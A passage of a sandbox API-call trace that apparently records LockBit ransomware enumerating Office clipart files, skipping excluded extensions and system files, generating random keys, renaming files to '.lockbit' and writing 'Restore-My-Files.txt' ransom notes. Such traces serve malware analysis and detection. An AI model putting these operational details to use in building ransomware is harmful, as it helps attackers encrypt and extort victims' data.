hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0179.820] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0179.825] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01238_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01238_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.825] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.825] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0179.825] free (_Block=0x1fa2ed8) [0179.825] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01238_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.825] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.825] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.825] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfa57200, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbfa57200, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01239_.GIF", cAlternateFileName="")) returned 1 [0179.825] lstrcmpiW (lpString1=".", lpString2="WB01239_.GIF") returned -1 [0179.825] lstrcmpiW (lpString1="..", lpString2="WB01239_.GIF") returned -1 [0179.825] PathFindExtensionW (pszPath="WB01239_.GIF") returned=".GIF" [0179.825] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.825] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.825] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.825] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.825] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.825] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.825] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.825] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.825] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.826] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.826] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.826] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.826] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.826] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.826] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.826] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.826] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.826] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.827] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.827] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01239_.GIF") returned -1 [0179.827] lstrcmpiW (lpString1="ntldr", lpString2="WB01239_.GIF") returned -1 [0179.827] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01239_.GIF") returned -1 [0179.827] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01239_.GIF") returned -1 [0179.827] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01239_.GIF") returned -1 [0179.827] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01239_.GIF") returned -1 [0179.827] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01239_.GIF") returned -1 [0179.827] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.827] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01239_.GIF") returned=".GIF" [0179.827] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.828] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.828] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.828] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.828] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.828] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.828] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.828] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.828] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.829] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.829] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.829] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.829] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.829] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.829] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.829] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.829] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01239_.GIF.lockbit") returned 72 [0179.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01239_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01239_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.830] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.830] malloc (_Size=0x40068) returned 0x3df0008 [0179.830] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=410) returned 1 [0179.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.831] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.832] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.832] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01239_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01239_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.836] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.836] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0179.837] free (_Block=0x1fa2ed8) [0179.837] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01239_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.837] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.837] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.837] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1d80d00, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa1d80d00, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x14d, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01240_.GIF", cAlternateFileName="")) returned 1 [0179.837] lstrcmpiW (lpString1=".", lpString2="WB01240_.GIF") returned -1 [0179.837] lstrcmpiW (lpString1="..", lpString2="WB01240_.GIF") returned -1 [0179.837] PathFindExtensionW (pszPath="WB01240_.GIF") returned=".GIF" [0179.837] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.837] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.837] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.837] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.837] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.837] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.837] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.837] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.837] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.837] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.837] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.837] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.837] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.838] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.838] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.838] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.838] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.838] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.838] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.838] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01240_.GIF") returned -1 [0179.839] lstrcmpiW (lpString1="ntldr", lpString2="WB01240_.GIF") returned -1 [0179.839] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01240_.GIF") returned -1 [0179.839] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01240_.GIF") returned -1 [0179.839] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01240_.GIF") returned -1 [0179.839] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01240_.GIF") returned -1 [0179.839] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01240_.GIF") returned -1 [0179.839] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.839] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01240_.GIF") returned=".GIF" [0179.839] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.839] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.839] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.839] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.839] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.839] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.839] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.839] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.840] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.840] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.840] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.840] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.840] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.840] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.840] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.840] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.840] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01240_.GIF.lockbit") returned 72 [0179.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01240_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01240_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.842] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.842] malloc (_Size=0x40068) returned 0x3df0008 [0179.842] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=333) returned 1 [0179.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.843] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.848] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01240_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01240_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.848] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.848] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0179.848] free (_Block=0x1fa2ed8) [0179.848] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01240_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.848] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.848] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.848] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x866d0200, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x866d0200, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01241_.GIF", cAlternateFileName="")) returned 1 [0179.848] lstrcmpiW (lpString1=".", lpString2="WB01241_.GIF") returned -1 [0179.848] lstrcmpiW (lpString1="..", lpString2="WB01241_.GIF") returned -1 [0179.848] PathFindExtensionW (pszPath="WB01241_.GIF") returned=".GIF" [0179.848] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.849] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.849] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.850] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.850] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.850] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01241_.GIF") returned -1 [0179.850] lstrcmpiW (lpString1="ntldr", lpString2="WB01241_.GIF") returned -1 [0179.850] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01241_.GIF") returned -1 [0179.850] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01241_.GIF") returned -1 [0179.850] lstrcmpiW (lpString1="autorun.inf", 